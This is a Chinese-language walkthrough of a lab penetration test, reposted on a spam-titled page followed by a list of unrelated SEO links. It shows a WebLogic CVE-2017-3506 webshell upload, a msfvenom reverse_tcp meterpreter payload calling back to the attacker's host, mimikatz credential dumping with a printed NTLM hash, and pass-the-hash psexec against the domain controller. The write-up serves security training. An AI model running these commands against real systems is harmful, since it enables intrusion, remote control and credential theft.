当前位置: 首页 > news >正文

厦门建设局网站技司学校公司做个网站多少钱

厦门建设局网站技司学校,公司做个网站多少钱,做网站定金是多少,网站做裂变引流环境配置 链接:百度网盘 请输入提取码 提取码:wmsi 攻击机:kali2022.03 web 192.168.111.80 10.10.10.80 自定义网卡8,自定义网卡18 PC 192.168.111.201 10.10.10.201 自定义网卡8,自定义网卡18 DC 192.168.52.1…

环境配置

链接:百度网盘 请输入提取码

提取码:wmsi

攻击机:kali2022.03

web 192.168.111.80 10.10.10.80 自定义网卡8,自定义网卡18

PC 192.168.111.201 10.10.10.201 自定义网卡8,自定义网卡18

DC 192.168.52.141 自定义网卡18

所有靶机密码为:1qaz@WSX

登录web de1ay 修改密码为Admin@123,

再切换用户mssql登录进行后,手动开启weblogic服务

C:\Oracle\Middleware\user_projects\domains\base_domain\bin

web渗透

1.扫描靶机开放端口和相应服务情况

nmap -p- -A -sV 192.168.111.80

2.进行下载weblogicscan配置requests时报的错

3.进行扫描成功探测到CVE-2017-3506

4.下载利用工具

git clone GitHub - ianxtianxt/CVE-2017-3506: CVE-2017-3506

5.java -jar WebLogic-XMLDecoder.jar //查看利用方法

java -jar WebLogic-XMLDecoder.jar -u http://192.168.111.80:7001/ //探测是否存在漏洞

java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp //上传木马

6.访问网址成功命令执行

http://192.168.111.80:7001//wls-wsat/shell.jsp?password=secfree&command=whoami

7.本地配置http代理,进行抓包

8.执行命令,成功抓到。

proxychains java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp

9.生成哥斯拉木马

10.查看木马,并复制去替换他命令执行的代码

11.成功替换

12.成功上线哥斯拉

13.msfvenom生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=5555 -f exe -o shell.exe

14.上传文件到哥斯拉

15.msf开启监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.111.129

set LPORT 5555

run

内网渗透

1.getsystem提权到管理员权限

2.ipconfig /all查看本机ip,所在域

3.信息收集

net user /domain //查看域用户

net group "domain admins" /domain //查看域管理员

net group "domain controllers" /domain //查看域控制器

net group "domain computers" /domain //查看域中的其他主机名

4.ping DC 拿到其ip地址

run autoroute -s 10.10.10.0/24 //添加路由

5.加载猕猴桃,拿到administrator的hash

Administrator

161cff084477fe596a5db81874498a24

6.配置代理

use auxiliary/server/socks_proxy

set srvhost 127.0.0.1

set srvport 8989

run

7.直接用impacket包里的psexec.py进行攻击,成功拿下域控

proxychains psexec.py -hashes :161cff084477fe596a5db81874498a24 ./administrator@10.10.10.10

http://www.dinnco.com/news/82194.html

相关文章:

  • 网站后台权限管理怎么做的自动点击器永久免费版
  • 龙岩网站开发公众号排名优化软件
  • 广西壮族自治区卫生健康委员会网站app推广注册接单平台
  • 自己做新闻网站互联网营销方案策划
  • 厦门成交型网站建设公司今天有什么新闻
  • 建设一个网站要花多少时间搜索引擎优化介绍
  • 天眼查官网登录入口百度seo优化关键词
  • 网站使用手册搜索引擎大全排行榜
  • 提供企业网站建设定制收录好的网站
  • 南昌网站排名优化央视新闻的新闻
  • 山东做公司网站seo推广排名
  • b2c网站的特点数据分析网页
  • 网站后台 模板深圳网络推广方法
  • wordpress增加定位锚点seo整站优化方案案例
  • 怎样建设一个公司网站优化网站有哪些方法
  • 国际网站如何推做推广做app软件大概多少钱
  • 什么网站做web搜索引擎种子最好口碑营销ppt
  • wordpress万年历插件重庆seo全网营销
  • 用layui做的一个网站模板抖音权重查询工具
  • 镇江网站优化seo视频教学网站
  • 施工企业分录长沙百度网站推广优化
  • 做破解网站合法网站如何做关键词优化
  • 怎么做网站投放adsense在线网页编辑平台
  • 一家做特卖的网站小程序开发软件
  • 网站设计分类十大广告投放平台
  • jsp商务网站开发seo优化名词解释
  • 做网站是用的那个开发软件谷歌关键词热度查询
  • 做网站百度百科北京seo关键词排名优化软件
  • 小型网站开发需要什么步骤seort什么意思
  • 如何用wd做网站设计电脑培训班有哪些科目